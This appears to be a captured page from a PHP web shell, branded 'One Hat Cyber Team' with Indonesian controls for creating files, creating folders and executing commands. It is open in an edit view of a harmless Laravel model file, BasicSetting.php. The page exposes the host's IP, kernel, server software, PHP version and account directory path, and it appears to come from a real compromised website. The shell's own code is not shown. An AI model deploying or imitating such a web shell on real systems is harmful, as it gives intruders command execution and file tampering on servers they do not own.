One Hat Cyber Team
Your IP :
3.142.144.163
Server IP :
172.67.155.96
Server :
Linux server3.shared.spaceship.host 4.18.0-372.9.1.1.lve.el8.x86_64 #1 SMP Tue May 24 07:49:22 EDT 2022 x86_64
Server Software :
LiteSpeed
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
rlcugxuggt
/
web.dafriappsdev.com
/
app
/
Models
/
Edit File:
BasicSetting.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class BasicSetting extends Model { public $timestamps = false; protected $fillable = [ "language_id", 'intro_subtitle', 'intro_title', 'intro_text', 'intro_main_image', 'team_section_title', 'team_section_subtitle', 'feature_section', 'process_section', 'templates_section', 'featured_users_section', 'pricing_section', 'partners_section', 'intro_section', 'testimonial_section', 'news_section', 'top_footer_section', 'copyright_section', 'footer_text', 'copyright_text', 'footer_logo', 'maintainance_mode', 'maintainance_text', 'maintenance_img', 'maintenance_status', 'secret_path', 'testimonial_image', 'partners_section_title', 'partners_section_subtitle', 'vcard_section', 'vcard_section_title', 'vcard_section_subtitle', 'intro_button_name', 'intro_button_url', 'adsense_publisher_id' ]; public function language() { return $this->belongsTo('App\Models\Language'); } }
Simpan